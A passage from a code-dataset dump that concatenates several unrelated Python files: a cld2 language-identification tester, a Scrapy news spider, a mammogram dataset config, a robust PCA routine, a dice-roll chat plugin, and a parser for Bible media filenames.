###\ndef get_correct_lang(text, lang):\n\treturn cld2full.detect(text)[2][0][1] == lang\n### FUNCTIONS ###\n\np = argparse.ArgumentParser(description=\"cld2 testing system\")\np.add_argument('-c', '--config', required=True, help='config file')\n\nargs = p.parse_args()\nconfig = yaml.load(open(args.config))\n\nif 'coverage' not in config:\n\tconfig['coverage'] = {}\n\nlangs = [lang for lang in config['langs']]\nlangs.sort() # i like sorted languages\n# in this case they make life easier\n\nfor lang in langs:\n\tif lang in config['coverage']:\n\t\tcontinue # we already tested this\n\n\tcount = 0\n\tbad_lines = []\n\tfilename = config['langs'][lang]\n\n\tif not filename[-5:] == \".norm\":\n\t\tprint(\"WARNING: Corpus for language %s has not been normalized.\" % lang)\n\n\t# generate a list of random numbers\n\tnum_lines = 0\n\twith open(filename) as f:\n\t\tfor line in f:\n\t\t\tnum_lines += 1\n\n\tif num_lines < NUM_LINES:\n\t\t# iterate through all\n\t\tprint(\"WARNING: Wikipedia corpus text is less than %d. Results may be inaccurate.\" % NUM_LINES)\n\t\tselect_lines = range(num_lines)\n\telse:\n\t\t# pick NUM_LINES lines from range\n\t\tselect_lines = random.sample(xrange(num_lines), NUM_LINES)\n\t\tselect_lines.sort()\n\n\twith open(filename) as f:\n\t\ti = 0\n\t\tj = 0\n\t\tfor line in f:\n\t\t\t# check if it's selected.\n\t\t\tif i == select_lines[j]:\n\t\t\t\ti += 1\n\t\t\t\tj += 1 # advance to the next line number\n\t\t\t\tif j >= len(select_lines):\n\t\t\t\t\tbreak # we finished going through all the lines\n\t\t\telse:\n\t\t\t\ti += 1\n\t\t\t\tcontinue\n\n\t\t\tif get_correct_lang(line, lang):\n\t\t\t\tcount += 1\n\t\t\telse:\n\t\t\t\tbad_lines.append(line)\n\n\t\tcoverage = float(count)/len(select_lines)\n\t\tconfig['coverage'][lang] = coverage\n\n\t\tprint(\"%s: %d/%d %f\" % (lang, count, len(select_lines), coverage))\n\t\tif len(bad_lines) > 0 and not count == 0:\n\t\t\tlines = random.sample(bad_lines, 20)\n\t\t\tfor line in lines:\n\t\t\t\tprint(\"\\t%s\" % line.strip())\n\t\tif coverage > 0.8:\n\t\t\tprint(\"** HIGH ACCURACY\")\n\t\telif coverage > 0.5:\n\t\t\tprint(\"** MEDIUM ACCURACY\")\n\t\telif coverage == 0.0:\n\t\t\tprint(\"** NOT SUPPORTED\")\n\t\telse:\n\t\t\tprint(\"** LOW ACCURACY\")\n\t\tprint(\"\")\n\n\t\twith open(args.config, 'w') as yaml_file:\n\t\t dump = yaml.dump(config, default_flow_style=False)\n\t\t yaml_file.write(dump)\n\nprint(\"All languages have been tested.\")","sub_path":"apertium-tools/lang-identify/lang-test/lang-test.py","file_name":"lang-test.py","file_ext":"py","file_size_in_byte":2322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"192549495","text":"#!/usr/bin/env python\n#-*- coding: utf-8 -*-\n# scrapy runspider slate_spider.py -o info.json\nimport urlparse\nimport scrapy\nimport json as json\n\nfrom slate.items import SlateItem\n\nfrom HTMLParser import HTMLParser\n\nclass MLStripper(HTMLParser):\n def __init__(self):\n self.reset()\n self.fed = []\n def handle_data(self, d):\n self.fed.append(d)\n def get_data(self):\n return ''.join(self.fed)\n\ndef strip_tags(html):\n s = MLStripper()\n s.feed(html)\n return s.get_data()\n\n\nclass SlateSpider(scrapy.Spider):\n name = \"slate\"\n start_urls = [\"http://www.slate.fr\"]\n\n def parse(self, response):\n \n for h in response.css(\"article > a::attr('href')\"):\n \n h = urlparse.urljoin(response.url, h.extract())\n \n\n yield scrapy.Request(h, callback=self.parsePage)\n \n \n def parsePage(self, response):\n \t\n for sel in response.css('body'):\n item = SlateItem()\n item['titre'] = u'{}'.format(sel.css('h1::text').extract()[0])\n item['sousTitre'] = u'{}'.format(sel.css('.hat::text').extract()[0]) \n \n item['content'] = u\"\";\n\n for p in sel.css('.main_content > p'):\n\n item['content']+=strip_tags(p.extract())\n \n yield item\n \n","sub_path":"tal/projet/slate/slate/spiders/slate_spider.py","file_name":"slate_spider.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"77552269","text":"\"\"\"\nPaths and other configuration properties.\n\"\"\"\n\nimport contextlib\nimport os\n\n# Path to the Mass-Training-Description (csv):\nMASS_TRAIN_DESCRIPTION_PATH = r'CBIS-DDSM\\mass_case_description_train_set.csv'\n\n# *Immediate* parent directory of the cases directories:\nDATASET_PATH = r'CBIS-DDSM\\Train\\Mass'\n\n# These files are created by the scripts. No need to modify these:\nwith contextlib.suppress(FileExistsError):\n os.mkdir('metadata')\nDESCRIPTIONS_PATH = os.path.join('metadata', 'mammograms_descriptions.csv')\nABNORMALITIES_PATH = os.path.join('metadata', 'abnormalities.json')\nAUGMENTED_DB_PATH = os.path.join('metadata', 'augmented_db.json')\n","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"550195068","text":"\nimport os\nimport numpy as np\nfrom numpy.linalg import norm\nfrom numpy.linalg import svd as npsvd\nimport time\nfrom scipy.ndimage import imread\n\n\ndef pcp(M, delta=1e-7, maxiter=500):\n\n shape = M.shape\n lam = np.max(shape) ** -0.5\n mu = 0.25 * np.prod(shape) / np.sum(np.abs(M))\n\n stop_cond = delta * norm(M, ord='fro')\n\n iter = 0\n S = np.zeros(shape)\n Y = np.zeros(shape)\n\n while iter < max(maxiter, 1):\n\n U, s, Vt = npsvd(M - S + Y/mu)\n s = shrink(s, 1/mu)\n rank = np.sum(s > 0.0)\n U, s, Vt = U[:, :rank], s[:rank], Vt[:rank, :]\n\n L = np.dot(U, np.dot(np.diag(s), Vt))\n S = shrink(M - L + Y/mu, lam/mu)\n\n Yterm = M - L - S\n Y += mu * (Yterm)\n\n if norm(Yterm, ord='fro') < stop_cond:\n break\n\n iter += 1\n\n if iter >= maxiter:\n print('does not converge in pcp')\n\n return L, S\n\n\ndef shrink(s, tau):\n sgn = np.sign(s)\n s_= np.abs(s) - tau\n s_[s_ < 0.0] = 0.0\n return sgn * s_\n\n\nif __name__ == \"__main__\":\n\n i = '10'\n os.chdir('/Users/a/downloads/CroppedYale/YaleB' + str(i))\n files = os.listdir()\n files = [file for file in files if 'pgm' in file]\n files = files[1:]\n print(files)\n storage = np.zeros((len(files), 192*168))\n\n idx = 0\n\n for file in files:\n storage[idx, :] = imread(file).flatten()\n idx += 1\n\n st = time.time()\n L, S = pcp(storage)\n print(time.time() - st)","sub_path":"rpca.py","file_name":"rpca.py","file_ext":"py","file_size_in_byte":1446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"33382169","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random\n\nimport shlex\n\n\nif __name__ == '__main__':\n import sys\n sys.path.append('../..')\n sys.path.append('../../libs')\n\nfrom plugins.parsingplugintemplate import ParsingPluginTemplate\n\nimport libs.janteparse as janteparse \n\n\nclass RollPlugin(ParsingPluginTemplate):\n \"\"\"\n roll is the default command for this plugin.\n\n roll\n Returns a number between 1 and n. n is confiured in the settingsfile and is by default 6.\n roll \n Returns a number between 1 and the specified integer.\n roll help\n Shows help.\n\n roll ...\n Picks a random word\n \"\"\"\n def __init__(self, bot):\n\n super().__init__(bot, command=\"roll\", description=\"Returns a diceroll.\")\n\n self.parser = janteparse.JanteParser(description='Random number generation!', prog=\"roll\", add_help=False)\n group = self.parser.add_mutually_exclusive_group()\n\n group.add_argument('-h', '--help', action='store_true', required=False, help=\"Shows this helpful message.\")\n group.add_argument('-n', '--newline', action='store_true', required=False, help=\"Splits at newline instead of at space and quations.\")\n\n self.parser.add_argument('items', nargs=\"*\", help=\"\"\"Items to roll between. If it is of type integer, roll a number between 1 and the supplied integer.\n If it is a list of items, pick one of the items. The items can be sperated by space or by using quotationmarks. If the -n option is used items are split up by newlines.\"\"\")\n\n def parse(self, message):\n # Doubleparse, to check for -n option before shlexing\n try:\n args = self.parser.parse_args(message.get_text().split(\" \"))\n except Exception as e:\n\n return janteparse.ArgumentParserError(\"\\n{}\".format(e))\n\n if args.newline:\n items = message.get_text().split(\"\\n\")#[1:]\n items[0] = \" \".join(items[0].split(\" \")[1:])\n if items[0].strip() == \"\" and len(items) == 1:\n items = []\n else:\n try:\n args = self.parser.parse_args(shlex.split(message.get_text()))\n\n except Exception as e:\n\n return janteparse.ArgumentParserError(\"\\n{}\".format(e))\n items = args.items\n if __debug__:\n self.log(\"Alternatives: {}\".format(items))\n if args.help:\n return self.parser.format_help()\n\n if len(items) > 1 or args.newline:\n if len(items) == 0:\n return RuntimeError(\"Can't pick between 0 items. {}\".format(self.parser.format_usage()))\n return random.choice(items)\n\n if len(items) == 0:\n d = int(6) # default to 6\n else:\n try:\n d = int(items[0])\n except:\n return ValueError(\"Must be an integer. \\\"{}\\\" is a {}.\".format(items[0], type(items[0])))\n\n roll = random.randint(1,d)\n return str(roll)\n","sub_path":"plugins/roll/roll.py","file_name":"roll.py","file_ext":"py","file_size_in_byte":3038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"393858621","text":"# FilenameParser.py\n\nimport io\nimport sys\nimport re\nfrom Lookup import *\nfrom SQLUtility import *\n\nclass Filename:\n\n\tdef __init__(self):\n\t\tself.book = \"\"\n\t\tself.chap = \"\"\n\t\tself.verseStart = \"\"\n\t\tself.verseEnd = \"\"\n\t\tself.bookSeq = \"\"\n\t\tself.fileSeq = \"\"\n\t\tself.name = \"\"\n\t\tself.title = \"\"\n\t\tself.usfx2 = \"\"\n\t\tself.damid = \"\"\n\t\tself.unknown = []\n\t\tself.type = \"\"\n\t\tself.file = \"\"\n\t\tself.errors = []\n\t\tself.template = None\n\n\n\tdef setBookSeq(self, bookSeq):\n\t\tself.bookSeq = bookSeq\n\t\tif not bookSeq.isdigit():\n\t\t\tif not bookSeq[0] in {\"A\", \"B\"}:\n\t\t\t\tself.errors.append(\"non-number bookSeq\")\n\n\n\tdef setFileSeq(self, fileSeq):\n\t\tself.fileSeq = fileSeq\n\t\tif not fileSeq.isdigit():\n\t\t\tself.errors.append(\"non-number fileSeq\")\n\n\n\t# Should be used before set chapter\n\tdef setBookName(self, name, chapterMap):\n\t\tself.name = name\n\t\tbookId = Lookup().usfmBookId(name)\n\t\tif bookId == None:\n\t\t\tself.errors.append(\"usfm not found for name: %s\" % (name))\n\t\telse:\n\t\t\tself.setBook(bookId, chapterMap)\n\n\n\tdef setBook(self, bookId, chapterMap):\n\t\tself.book = bookId\n\t\tif bookId not in chapterMap.keys():\n\t\t\tself.errors.append(\"usfm code %s is not valid\" % (bookId))\n\n\n\tdef setUSFX2(self, usfx2, chapterMap, usfx2Map):\n\t\tself.usfx2 = usfx2\n\t\tbookId = usfx2Map.get(usfx2)\n\t\tself.setBook(bookId, chapterMap)\n\n\n\tdef setChap(self, chap, chapterMap):\n\t\tself.chap = chap\n\t\tif chap.lower() == \"end\":\n\t\t\treturn\n\t\tif not chap.isdigit():\n\t\t\tself.errors.append(\"non-number chap\")\n\t\telif self.book != None:\n\t\t\tchapter = chapterMap.get(self.book)\n\t\t\tif chapter != None and int(chap) > int(chapter):\n\t\t\t\tself.errors.append(\"chap too large: %s for %s\" % (chap, self.book))\n\n\n\tdef setVerseStart(self, verseStart):\n\t\tself.verseStart = verseStart\n\t\tif not verseStart.isdigit():\n\t\t\tself.errors.append(\"non-number verse start: %s\" % (verseStart))\n\n\n\tdef setVerseEnd(self, verseEnd):\n\t\tself.verseEnd = verseEnd\n\t\tif not verseEnd.isdigit():\n\t\t\tif not verseEnd[:-1].isdigit() or not verseEnd[-1] == \"r\":\n\t\t\t\tself.errors.append(\"non-number verse end: %s\" % (verseEnd))\n\n\n\tdef setTitle(self, title):\n\t\tself.title = title\n\n\n\tdef setDamid(self, damid):\n\t\tself.damid = damid\n\n\n\tdef addUnknown(self, unknown):\n\t\tself.unknown.append(unknown)\n\n\n\tdef getUnknown(self, index):\n\t\treturn self.unknown[index] if index < len(self.unknown) else \"\"\n\n\n\tdef setType(self, typ):\n\t\tself.type = typ\n\n\n\tdef numErrors(self):\n\t\treturn len(self.errors)\n\n\n\tdef setFile(self, template, filename):\n\t\tself.file = filename\n\t\tfileOut = []\n\t\tmiscIndex = 0\n\t\tfor item in template.parts:\n\t\t\tif item == \"book_seq\":\n\t\t\t\tfileOut.append(self.bookSeq)\n\t\t\telif item == \"file_seq\":\n\t\t\t\tfileOut.append(self.fileSeq)\n\t\t\telif item == \"book_name\":\n\t\t\t\tfileOut.append(self.name.replace(\"_\",\"\"))\n\t\t\telif item == \"book_id\":\n\t\t\t\tfileOut.append(self.book)\n\t\t\telif item == \"usfx2\":\n\t\t\t\tfileOut.append(self.usfx2)\n\t\t\telif item == \"chapter\":\n\t\t\t\tif not template.optionalChapter or self.chap != \"0\":\n\t\t\t\t\tfileOut.append(self.chap)\n\t\t\telif item == \"verse_start\":\n\t\t\t\tfileOut.append(self.verseStart)\n\t\t\telif item == \"verse_end\":\n\t\t\t\tfileOut.append(self.verseEnd)\n\t\t\telif item == \"title\":\n\t\t\t\tfileOut.append(self.title.replace(\"_\",\"\"))\n\t\t\telif item == \"damid\":\n\t\t\t\tfileOut.append(self.damid)\n\t\t\telif item == \"type\":\n\t\t\t\tfileOut.append(self.type)\n\t\t\telif item == \"misc\":\n\t\t\t\tfileOut.append(self.getUnknown(miscIndex))\n\t\t\t\tmiscIndex += 1\n\t\tfilenameOut = \"\".join(fileOut).replace(\"_\",\"\")\n\t\tif filenameOut != filename.replace(\"_\",\"\").replace(\"-\",\"\").replace(\".\",\"\"):\n\t\t\tself.errors.append(\"Mismatch %s\" % (filenameOut))\n\n\n\tdef print(self):\n\t\tprint(self.bookSeq, self.fileSeq, self.book, self.chap, self.name, self.damid, self.type, self.file, self.errors)\n\n\nclass FilenameTemplate:\n\n\tdef __init__(self, name, parts, specialInst):\n\t\tself.name = name\n\t\tself.parts = parts\n\t\tself.numParts = len(parts)\n\t\tself.namePosition = None\n\t\tself.chapterPosition = None\n\t\tfor index in range(len(parts)):\n\t\t\tpart = parts[index]\n\t\t\tif part not in {\"book_id\", \"chapter\", \"verse_start\", \"verse_end\", \n\t\t\t\t\"book_seq\", \"file_seq\", \"book_name\", \"usfx2\", \"title\", \"damid\", \"type\", \"misc\"}:\n\t\t\t\tprint(\"ERROR: filenameTemplate part %s is not known\" % (part))\n\t\t\t\tsys.exit()\n\t\t\tif part in {\"book_name\", \"title\"}:\n\t\t\t\tself.namePosition = index\n\t\t\tif part == \"chapter\":\n\t\t\t\tself.chapterPosition = index\n\t\tself.hasProblemDamId = (\"damid_front_clean\" in specialInst)\n\t\tself.verseEndClean = (\"verse_end_clean\" in specialInst)\n\t\tself.optionalChapter = (\"optional_chapter\" in specialInst)\n\t\tself.splitPosition2 = (\"split_position2\" in specialInst)\n\t\tself.scanForBookId = (\"scan_for_book_id\" in specialInst)\n\n\nclass FilenameParser:\n\n\tdef __init__(self):\n\t\tself.parsedList = []\n\t\tself.unparsedList = []\n\t\tself.audioTemplates = (\n\t\t\t##FilenameTemplate(\"audio0\", (\"type\",), ()),\n\t\t\t## {bookseq}___{chap}_{bookname}____{damid}.mp3 B01___01_Matthew_____ENGGIDN2DA.mp3\n\t\t\tFilenameTemplate(\"audio6\", (\"book_seq\", \"chapter\", \"book_name\", \"damid\", \"type\"), (\"damid_front_clean\",)),\n\t\t\t## {misc}_{misc}_Set_{fileseq}_{bookname}_{chap}_{verse_start}-{verse_end}.mp3 Nikaraj_P2KFTNIE_Set_051_Luke_21_1-19.mp3\n\t\t\tFilenameTemplate(\"audio1\", (\"misc\", \"misc\", \"misc\", \"file_seq\", \"book_name\", \"chapter\", \"verse_start\", \"verse_end\", \"type\"), ()),\n\t\t\t## {fileseq}_{USFM}_{chap}_{versestart}-{verseend}_SET_{unknown}___{damid}.mp3 audio/SNMNVS/SNMNVSP1DA16/052_GEN_027_18-29_Set_54____SNMNVSP1DA.mp3\n\t\t\tFilenameTemplate(\"audio2\", (\"file_seq\", \"book_id\", \"chapter\", \"verse_start\", \"verse_end\", \"misc\", \"misc\", \"damid\", \"type\"), ()),\n\t\t\t## {lang}_{vers}_{bookseq}_{bookname}_{chap}_{versestart}-{verseend}_{unknown}_{unknown}.mp3 audio/SNMNVS/SNMNVSP1DA/SNM_NVS_01_Genesis_041_50-57_SET91_PASSAGE1.mp3\n\t\t\tFilenameTemplate(\"audio3\", (\"misc\", \"misc\", \"book_seq\", \"book_name\", \"chapter\", \"verse_start\", \"verse_end\", \"misc\", \"misc\", \"type\"), ()),\n\t\t\t## {bookseq}___{fileseq}_{bookname}_{chap}_{startverse}_{endverse}{name}__damid.mp3 audio/PRSGNN/PRSGNNS1DA/B01___22_Genesis_21_1_10BirthofIsaac__S1PRSGNN.mp3\n\t\t\tFilenameTemplate(\"audio4\", (\"book_seq\", \"file_seq\", \"book_name\", \"chapter\", \"verse_start\", \"verse_end\", \"title\", \"damid\", \"type\"), (\"verse_end_clean\",)),\n\t\t\t## missing explaination\n\t\t\tFilenameTemplate(\"audio5\", (\"file_seq\", \"misc\", \"misc\", \"misc\", \"book_name\", \"chapter\", \"type\"), ()),\n\n\t\t\t## {bookseq}__{fileseq}_{non-standar-book-id}_{chapter}_{chapter_end}_{damid}.mp3 A01__002_GEN_1_2__S1DESWBT.mp\n\n\t\t\t## {bookseq}_{fileseq}__{bookname}_{chap}_____{damid}.mp3 A08_073__Ruth_01_________S2RAMTBL.mp3\n\t\t\tFilenameTemplate(\"audio8\", (\"book_seq\", \"file_seq\", \"book_name\", \"chapter\", \"damid\", \"type\"), ()),\n\n\t\t\t## {bookseq}_{bookname}_{chap}_{damid}.mp3 B01_Genesis_01_S1COXWBT.mp3\n\t\t\tFilenameTemplate(\"audio7\", (\"book_seq\", \"book_name\", \"chapter\", \"damid\", \"type\"), ()),\n \t\t\t## {file_seq}_{testament}_{KDZ}_{vers}_{bookname}_{chap}.mp3 1215_O2_KDZ_ESV_PSALM_57.mp3\n\t\t\tFilenameTemplate(\"audio9\", (\"book_seq\", \"file_seq\", \"book_name\", \"chapter\", \"misc\", \"damid\", \"type\"), ()),\n\t\t\t## Need to somehow lower the priority of this template, so it is only used when others fail totally.\n\t\t\t\n\t\t\t## {fileseq}_{title}.mp3\n\t\t\tFilenameTemplate(\"audio_story\", (\"file_seq\", \"title\", \"type\"), ()),\n\t\t\tFilenameTemplate(\"audio_story2\", (\"book_seq\", \"file_seq\", \"title\", \"type\"), ())\n\t\t)\n\t\tself.textTemplates = (\n\t\t\t## {damid}_{bookseq}_{bookid}_{optionalchap}.html AAZANT_70_MAT_10.html\n\t\t\tFilenameTemplate(\"text1\", (\"damid\", \"book_seq\", \"book_id\", \"chapter\", \"type\"), (\"optional_chapter\",)),\n\t\t\t## {usfx2}{optionalchap}.html AC12.html\n\t\t\tFilenameTemplate(\"text2\", (\"usfx2\", \"chapter\", \"type\"), (\"split_position2\", \"optional_chapter\")),\n\t\t)\n\t\tself.videoTemplates = (\n\t\t\t## {lang}_{book_id}_{chap}-{verse_start}-{verse-end}.mp4 Romanian_MRK_9-33-50.mp4\n\t\t\tFilenameTemplate(\"video1\", (\"misc\", \"book_id\", \"chapter\", \"verse_start\", \"verse_end\", \"type\"), (\"scan_for_book_id\",)),\n\t\t\t## This pattern has an extra 1 at the end\n\t\t\tFilenameTemplate(\"video2\", (\"misc\", \"book_id\", \"chapter\", \"verse_start\", \"verse_end\", \"misc\", \"type\"), (\"scan_for_book_id\",)),\n\t\t\t## This pattern for extra R_1 at the end\n\t\t\tFilenameTemplate(\"video3\", (\"misc\", \"book_id\", \"chapter\", \"verse_start\", \"verse_end\", \"misc\", \"misc\", \"type\"), (\"scan_for_book_id\",)),\n\t\t\t## This pattern for End Credit\n\t\t\tFilenameTemplate(\"video4\", (\"misc\", \"book_id\", \"chapter\", \"misc\", \"type\"), (\"scan_for_book_id\",)),\n\t\t\t## This pattern for End Credit with extra 1 at the end\n\t\t\tFilenameTemplate(\"video5\", (\"misc\", \"book_id\", \"chapter\", \"misc\", \"misc\", \"type\"), (\"scan_for_book_id\",)),\n\t\t\t## This pattern for End Credit with extra R_1 at the end\n\t\t\tFilenameTemplate(\"video6\", (\"misc\", \"book_id\", \"chapter\", \"misc\", \"misc\", \"misc\", \"type\"), (\"scan_for_book_id\",)),\n\n\t\t\t## This pattern for\n\t\t\t## {lang}_{book_id}_End_Credits.mp4 Romanian_MRK_End_Credits.mp4\n# What ever happened to MBCWBT It is th format below\n\t\t\t## {bookseq}___{chap}_{bookname}___{damid}.mp3 MBCMVAN1DA16/B01___23_S_Mateus____MBCMVAN1DA.mp3\n\t\t\t##FilenameTemplate(\"video3\", (\"book_seq\", \"chapter\", \"book_name\", \"damid\", \"type\"), (\"damid_front_clean\",)),\n\t\t)\n\n\n\tdef parse(self, template, filename):\n\t\tfile = Filename()\n\t\tfile.template = template\n\t\tparts = re.split(\"[_.-]+\", filename)\n\t\tif template.splitPosition2:\n\t\t\tself.splitPosition(parts, 2)\n\t\tif template.scanForBookId:\n\t\t\tself.scanForBookId(parts)\n\t\tif template.hasProblemDamId:\n\t\t\tself.splitDamIdIfNeeded(parts, -2)\n\t\tif template.verseEndClean:\n\t\t\tverseEndPos = template.parts.index(\"verse_end\")\n\t\t\tif verseEndPos < len(parts):\n\t\t\t\tself.splitNumAlpha(parts, verseEndPos)\n\t\tif len(parts) > template.numParts and template.namePosition != None:\n\t\t\tself.combineName(parts, template.namePosition, template.numParts)\n\t\tif template.optionalChapter and (len(parts) + 1) == template.numParts:\n\t\t\tself.addZeroChapter(parts, template)\n\t\tif template.numParts == len(parts):\n\t\t\tfor index in range(template.numParts):\n\t\t\t\tpart = parts[index]\n\t\t\t\titem = template.parts[index]\n\t\t\t\tif item == \"book_seq\":\n\t\t\t\t\tfile.setBookSeq(part)\n\t\t\t\telif item == \"file_seq\":\n\t\t\t\t\tfile.setFileSeq(part)\n\t\t\t\telif item == \"book_name\":\n\t\t\t\t\tfile.setBookName(part, self.chapterMap)\n\t\t\t\telif item == \"usfx2\":\n\t\t\t\t\tfile.setUSFX2(part, self.chapterMap, self.usfx2Map)\n\t\t\t\telif item == \"book_id\":\n\t\t\t\t\tfile.setBook(part, self.chapterMap)\n\t\t\t\telif item == \"chapter\":\n\t\t\t\t\tfile.setChap(part, self.chapterMap)\n\t\t\t\telif item == \"verse_start\":\n\t\t\t\t\tfile.setVerseStart(part)\n\t\t\t\telif item == \"verse_end\":\n\t\t\t\t\tfile.setVerseEnd(part)\n\t\t\t\telif item == \"title\":\n\t\t\t\t\tfile.setTitle(part)\n\t\t\t\telif item == \"damid\":\n\t\t\t\t\tfile.setDamid(part)\n\t\t\t\telif item == \"type\":\n\t\t\t\t\tfile.setType(part)\n\t\t\t\telif item == \"misc\":\n\t\t\t\t\tfile.addUnknown(part)\n\t\t\t\telse:\n\t\t\t\t\tprint(\"ERROR: unknown type in template %s\" % (item))\n\t\t\t\t\tsys.exit()\t\n\t\telse:\n\t\t\tfile.errors.append((\"expect %d parts, have %d\" % (template.numParts, len(parts))))\n\t\tfile.setFile(template, filename)\n\t\treturn file\n\n\n\t## This method will split the first part into 2 at a specified position\n\tdef splitPosition(self, parts, position):\n\t\tif len(parts[0]) > position:\n\t\t\tfirst = parts[0]\n\t\t\tparts[0] = first[:position]\n\t\t\tparts.insert(1, first[position:])\n\n\n\t## This method searches parts for a valid bookId, combines all preceding parts into 1 part\n\tdef\tscanForBookId(self, parts):\n\t\tbookPosition = 0\n\t\tfor index in range(len(parts)):\n\t\t\tif parts[index] in {\"MAT\", \"MRK\", \"LUK\", \"JHN\", \"ACT\"}:\n\t\t\t\tbookPosition = index \n\t\t\t\tbreak\n\t\tfor index in range(bookPosition - 1):\n\t\t\tparts[0] = parts[0] + \"_\" + parts[1]\n\t\t\tparts.pop(1)\n\n\n\n\t## This method splits between Bible bookname and a damid, when there was no _ between them\n\tdef splitDamIdIfNeeded(self, parts, damidIndex):\n\t\tdamid = parts[damidIndex]\n\t\tif any(c.islower() for c in damid):\n\t\t\tfor index in range(len(damid) -1, 0, -1):\n\t\t\t\tif damid[index].islower():\n\t\t\t\t\tparts[damidIndex] = damid[index + 1:]\n\t\t\t\t\tparts.insert(damidIndex, damid[:index + 1])\n\t\t\t\t\tbreak\n\n\n\t## This method combines parts starting at a position to return a list of a stated size\n\tdef combineName(self, parts, namePart, maxParts):\n\t\twhile (len(parts) > maxParts):\n\t\t\tparts[namePart] = parts[namePart] + \"_\" + parts[namePart + 1]\n\t\t\tparts.pop(namePart + 1)\n\n\n\t## Split a part that is part alpha and part numberic into two parts\n\tdef splitNumAlpha(self, parts, splitPart):\n\t\tstring = parts[splitPart]\n\t\tfor index in range(len(string)):\n\t\t\tif string[index].isalpha():\n\t\t\t\tparts[splitPart] = string[:index]\n\t\t\t\tparts.insert(splitPart + 1, string[index:])\n\t\t\t\tbreak\n\n\n\t## Add a zero where that part was missing, this is used for chapters\n\tdef addZeroChapter(self, parts, template):\n\t\tparts.insert(template.chapterPosition, \"0\")\n\n\n\n\tdef process(self, typeCode):\n\t\tdb = SQLUtility(\"localhost\", 3306, \"root\", \"valid_dbp\")\n\t\tself.chapterMap = db.selectMap(\"SELECT id, chapters FROM books\", None)\n\t\tself.usfx2Map = db.selectMap(\"SELECT id_usfx, id FROM books\", None)\n\t\tself.usfx2Map['J1'] = '1JN' ## fix incorrect entry in books table\n\t\tsql = (\"SELECT concat(type_code, '/', bible_id, '/', fileset_id), file_name\"\n\t\t\t+ \" FROM bucket_listing where type_code=%s limit 1000000000\")\n\t\tsqlTest = ((\"SELECT concat(type_code, '/', bible_id, '/', fileset_id), file_name\"\n\t\t\t+ \" FROM bucket_listing where type_code=%s AND bible_id='PORERV'\"))\n\t\tfilenamesMap = db.selectMapList(sql, (typeCode))\n\t\tdb.close()\n\n\t\tif typeCode == \"audio\":\n\t\t\ttemplates = self.audioTemplates\n\t\telif typeCode == \"text\":\n\t\t\ttemplates = self.textTemplates\n\t\telif typeCode == \"video\":\n\t\t\ttemplates = self.videoTemplates\n\t\telse:\n\t\t\tprint(\"ERROR: unknown type_code: %s\" % (typeCode))\n\n\t\tfor prefix in filenamesMap.keys():\n\t\t\tfilenames = filenamesMap[prefix]\n\t\t\t(numErrors, template, files) = self.parseFileset(templates, prefix, filenames)\n\t\t\tif numErrors == 0:\n\t\t\t\tself.parsedList.append((template.name, prefix))\n\t\t\telse:\n\t\t\t\tself.unparsedList.append((numErrors, template.name, prefix))\n\t\t\t\tfor file in files:\n\t\t\t\t\tif len(file.errors) > 0:\n\t\t\t\t\t\tprint(prefix, file.file, \", \".join(file.errors))\n\n\n\tdef parseFileset(self, templates, prefix, filenames):\n\t\tparserTries = []\n\t\tfor template in templates:\n\t\t\t(numErrors, template, files) = self.parseOneFileset(template, prefix, filenames)\n\t\t\tif numErrors == 0:\n\t\t\t\treturn (numErrors, template, files)\n\t\t\tparserTries.append((numErrors, template, files))\n\t\tbest = 1000000\n\t\tselected = None\n\t\tfor aTry in parserTries:\n\t\t\tif aTry[0] < best:\n\t\t\t\tbest = aTry[0]\n\t\t\t\tselected = aTry\n\t\treturn selected\n\n\n\tdef parseOneFileset(self, template, prefix, filenames):\n\t\tnumErrors = 0\n\t\tfiles = []\n\t\tfor filename in filenames:\n\t\t\tfile = self.parse(template, filename)\n\t\t\tfiles.append(file)\n\t\t\tif len(file.errors) > 0:\n\t\t\t\tnumErrors += 1\n\t\treturn (numErrors, template, files)\n\n\n\tdef summary(self):\n\t\tfile = io.open(\"FilenameParser.out\", mode=\"w\", encoding=\"utf-8\")\n\t\tfor entry in self.parsedList:\n\t\t\tfile.write(\"%s %s\\n\" % entry)\n\t\tfile.write(\"\\n\\nUnparsed\\n\\n\")\n\t\tfor entry in self.unparsedList:\n\t\t\tfile.write(\"%d %s %s\\n\" % entry)\n\t\tfile.close()\n\n\n\t## Process2 processes tries each template with each file and returns the best parse\n\tdef process2(self, typeCode):\n\t\tdb = SQLUtility(\"localhost\", 3306, \"root\", \"valid_dbp\")\n\t\tself.chapterMap = db.selectMap(\"SELECT id, chapters FROM books\", None)\n\t\textras = {\"FRT\":6, \"INT\":1, \"BAK\":2, \"LXX\":1, \"CNC\":2, \"GLO\":26, \"TDX\":1, \"NDX\":1, \"OTH\":5, \n\t\t\t\"XXA\":4, \"XXB\":3, \"XXC\":1, \"XXD\":1, \"XXE\":1, \"XXF\":1, \"XXG\":1}\n\t\tself.chapterMap.update(extras)\n\t\tcorrections = {\"MAN\":1, \"PS2\":1}\n\t\tself.chapterMap.update(corrections)\n\t\t#self.chapterMap[\"PSA\"] = 151\n\t\tself.usfx2Map = db.selectMap(\"SELECT id_usfx, id FROM books\", None)\n\t\textras = {\"FR\":\"FRT\", \"IN\":\"INT\", \"BK\":\"BAK\", \"CN\":\"CNC\", \"GS\":\"GLO\", \"TX\":\"TDX\", \"OH\":\"OTH\",\n\t\t\t\"XA\":\"XXA\", \"XB\":\"XXB\", \"XC\":\"XXC\", \"XD\":\"XXD\", \"XE\":\"XXE\", \"XF\":\"XXF\", \"XG\":\"XXG\"}\n\t\tself.usfx2Map.update(extras)\n\t\tself.usfx2Map[\"J1\"] = \"1JN\" ## fix incorrect entry in books table\n\t\tsql = (\"SELECT concat(type_code, '/', bible_id, '/', fileset_id), file_name\"\n\t\t\t+ \" FROM bucket_listing where type_code=%s limit 1000000000\")\n\t\tsqlTest = ((\"SELECT concat(type_code, '/', bible_id, '/', 